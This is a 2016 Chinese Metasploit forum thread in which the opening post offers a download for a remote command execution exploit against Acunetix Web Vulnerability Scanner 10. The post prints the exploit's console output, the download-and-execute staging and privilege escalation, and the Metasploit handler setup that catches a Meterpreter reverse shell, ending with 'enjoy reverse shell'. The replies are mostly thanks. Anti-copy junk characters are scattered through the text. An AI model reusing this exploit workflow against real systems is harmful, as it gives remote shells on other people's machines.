Metasploit渗透测试论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

Metascan metasploit pro
查看: 4568|回复: 8

Acunetix Web Vulnerability Scanner 10 远程溢出 没人发我就发了

[复制链接]

22

主题

1

好友

1551

积分

正式会员

Rank: 2

活跃会员 突出贡献

发表于 2016-5-14 05:45:41 |显示全部楼层
本帖最后由 白菜 于 2016-5-23 13:28 编辑
# B1 Z6 m# ^1 c. j. G! x3 Q+ v4 v  D) R# j" ]+ x5 w
poc 下载 链接: http://pan.baidu.com/s/1dENCnJz 密码:
游客,如果您要查看本帖隐藏内容请回复
# B+ ]; v8 H7 O' a& f
演示图片下载 http://pan.baidu.com/s/1o7Uf45k, N% o! V9 t" J/ A6 @
metasploit兴趣群:537620869 欢迎加入# {% s- O! H& j' s+ v- ]8 W

( q+ \; H7 N1 J6 W7 H
5 k: M1 n+ u  V8 P- Y6 y! W9 M# N# A: }root@kali:~# python acu0day.py  9999 172.16.24.1
. R9 c; {; c. Z5 e8 g" d2 p# s" r* }5 H& m+ m$ t
Acunetix WVS 10 - SYSTEM Remote Command Execution (Daniele Linguaglossa)
1 z! Z, {$ o1 v( l* Q4 gPayload: Meterpreter reverse TCP 4444: k7 z. b, u1 R4 L
Exploit started on port *:9999
) }, o8 ^* U( g( d[+] Waiting for scanner... Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (2100) bytes ! Triggering EXPLOIT_STAGE_2 sending (5068) bytes ! Sleeping 1 minutes to elevate privileges...ZzZz
( d/ e1 Y1 F% G- {# e- e[!] Stopping server !1 `. z0 j2 ]5 c. Q
[!] Exploit successful wait for session!
; G9 {* e5 d' c& eThen start a metasploit session and listen on port 4444! H8 V( c4 s7 ?
  y" O7 V. A9 u! U- [' Z. c: X
msf exploit(handler) > show options
" g! c" k$ J  \9 o9 K2 o% j9 T" B( c
% S6 @) K" ^$ o3 \6 ZModule options (exploit/multi/handler):! Z5 d% M/ g* `: |2 s  n
+ M& v8 ^! F! }/ M9 z' \8 `0 j
   Name  Current Setting  Required  Description: Q1 b% Z% e$ }
   ----  ---------------  --------  -----------
7 W/ G+ B# n5 a, y2 i  g$ P& S1 A; N( T6 {/ z
! @( l- H7 ]0 n' N
Payload options (windows/meterpreter/reverse_tcp):1 J8 L+ }: g4 p' i5 N# m
& r4 H9 `& U6 R
   Name      Current Setting  Required  Description
4 c7 z" W) z  E4 H3 B+ a3 @   ----      ---------------  --------  -----------& `6 n) z2 w' _# h
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)  k, d8 l3 [, f
   LHOST     0.0.0.0          yes       The listen address0 e( g7 v% n) ?2 ~7 i
   LPORT     4444             yes       The listen port
& p! b+ I* M9 H# s, X* E4 V  _) U8 k/ `  _$ M" {/ C: r+ L5 w

# B% ?9 C% V" ]0 m" `/ jExploit target:
' f7 ]  c; b3 P* D
; {! Q+ g) k  Z9 i   Id  Name0 }" L& T+ w( A- _, R4 \, Z3 N& B
   --  ----
. F! g  D* D5 j  Y0 @   0   Wildcard Target
- p% `4 y! i" M2 BStart a new scan with Acunetix using your local ip and enjoy reverse shell!$ g3 M( ~* U& E  h
4 i7 w5 h( y, ?2 Y+ L
msf exploit(handler) > run3 o5 m& V. I2 u$ c
Started reverse TCP handler on 0.0.0.0:4444 Starting the payload handler... Sending stage (957487 bytes) to 172.16.24.192 Meterpreter session 1 opened (172.16.24.1:4444 -> 172.16.24.192:51782) at 2016-05-02 15:02:31 +0200( h+ P2 s1 P3 \0 C4 g1 v
9 B( w3 d3 \1 O: {* H
meterpreter >0 Y  s2 O$ A# U7 h4 V! v; D

如文中未特别声明转载请注明出自:http://www.metasploit.cn/

0

主题

0

好友

114

积分

正式会员

Rank: 2

发表于 2016-5-14 15:50:35 |显示全部楼层
老规矩,先回后下!!!!!!!
% \2 O  z* h" Q/ f% G

22

主题

0

好友

514

积分

禁止访问

发表于 2016-5-16 08:31:21 |显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽

17

主题

0

好友

990

积分

正式会员

Rank: 2

发表于 2016-5-24 15:54:11 |显示全部楼层
我擦,烂白菜

0

主题

1

好友

2220

积分

正式会员

Rank: 2

发表于 2016-5-31 20:53:39 |显示全部楼层
学习学习!!!

0

主题

1

好友

622

积分

正式会员

Rank: 2

发表于 2016-6-2 16:35:17 |显示全部楼层
学习一下!

0

主题

1

好友

53

积分

正式会员

Rank: 2

发表于 2016-6-6 16:46:08 |显示全部楼层
谢谢 ,就是现在不能在线升级了

2

主题

0

好友

195

积分

正式会员

Rank: 2

发表于 2016-8-31 09:06:16 |显示全部楼层
好好学习天天学习

4

主题

0

好友

153

积分

正式会员

Rank: 2

发表于 2017-5-1 03:05:49 来自手机 |显示全部楼层
xjfjcjcjcjrjrjrjrjjfjccjfnfnfnjfjffj
*滑动验证:
您需要登录后才可以回帖 登录 | 立即注册

QQ|Archiver|手机版|Metasploit ( 粤ICP备15008156号-1 )

GMT+8, 2017-8-24 18:29 , Processed in 0.399545 second(s), 30 queries .

Powered by Discuz! X2.5

© 2001-2012 Comsenz Inc.

回顶部